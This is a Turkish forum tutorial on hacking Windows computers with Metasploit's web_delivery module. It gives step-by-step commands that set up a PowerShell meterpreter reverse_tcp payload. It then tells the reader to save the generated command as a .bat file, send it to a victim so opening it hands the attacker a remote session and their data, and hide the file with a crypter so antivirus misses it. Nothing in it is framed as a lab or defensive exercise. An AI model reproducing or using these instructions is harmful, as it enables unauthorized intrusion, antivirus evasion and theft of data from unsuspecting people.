Merhaba arkadaşlar. Bugün bir çok kişinin bilgisayar hackleme sorununa çözüm olacak bir konu ile karşınızdayım. Bu konumda port açmadan, duck dns ile uğraşmadan windows makineleri hacklemeyi anlatacağım.
Bu işlemi Métasploit aracını kullanarak yapacağız. Métasploit aracının içerisinde bulunan Web Delivery scriptini kullanarak yapacağız. İlk öncelikle msfconsole komutu ile métasploit aracımızı çalıştırıyoruz.
Métasploit aracımızı açtıktan sonra aşağıda vereceğim komutları sırası ile girin.
Kod:
use exploit/multi/script/web_delivery =>>> Web Delivery scriptimizin içine giriyor.
Kod:
show options =>>> Bu komut ile scripti çalıştırmak için neler gerektiğini görebilirsiniz.
Kod:
set lhost ip =>>> Kali Linuxun ip adresi. İfconfig yazarak öğrenebilirsiniz.
Kod:
set lport 4444 =>>> Oturumun bağlanacağı port. Bir port açmaya gerek yok direk 4444 yazınız.
Yukarıdaki adımları yaptıktan sonra bir sonraki aşamaya geçelim. Yine aşağıdaki vereceğim komutları yazarak bu adımı da tamamlayabilirsiniz.
Kod:
show targets =>>> Hedef hakkında bilgi almaya yarıyor.
Kod:
set target 2 =>>> Virüsümüzün hangi platformda çalışacağını belirler. Biz windows sistemleri hackleyeceğimiz için 2. seçeneği powershell' i seçtik.
Kod:
set payload windows/meterpreter/reverse_tcp =>>> Payloadımızı seçiyoruz.
Kod:
exploit =>>> Scriptimizin çalışmasını sağlar.
Yukarıdaki adımları uyguladıktan sonra bize bir kod verecek. Yukarıdaki resimde de gördüğünüz gibi bize verdiği bu kodu kopyalıyoruz ve bir metin belgesi açıp yapıştırıyoruz. Sonra farklı kaydet seçeneği ile dosya türünü .bat olarak kaydediyoruz.
Bu adımları yaptıktan sonra oluşturduğumuz .bat dosyasını bir kişiye attığımızda ve bu kişi de o bat dosyasını açtığında size oturum gelir ve o kişinin bilgisayarından istediğiniz veriyi alabilirsiniz.
Test etmek isteyen kişiler windowsta cmd yi veya powershell' i açarak kopyaladığımız kodu oraya direk yapıştırıp entere basın. Sisteme virüs bulaşmış olup ve size oturum gelmiş olacak.
NOT: Oluşturduğumuz bat dosyasını çeşitli yollarla gizleyin (crypterleyi) yoksa anti virüs programlarına yakalanır.
NOT: Oluşturduğumuz bat dosyasını çeşitli yollarla gizleyin (crypterleyi) yoksa anti virüs programlarına yakalanır.
Bu yöntemi kullanarak port açmadan, duck dns ile uğraşmadan kolayca windows sistemleri hackleyebilirsiniz. Kolay gelsin. İyi formlar.
Son düzenleme:

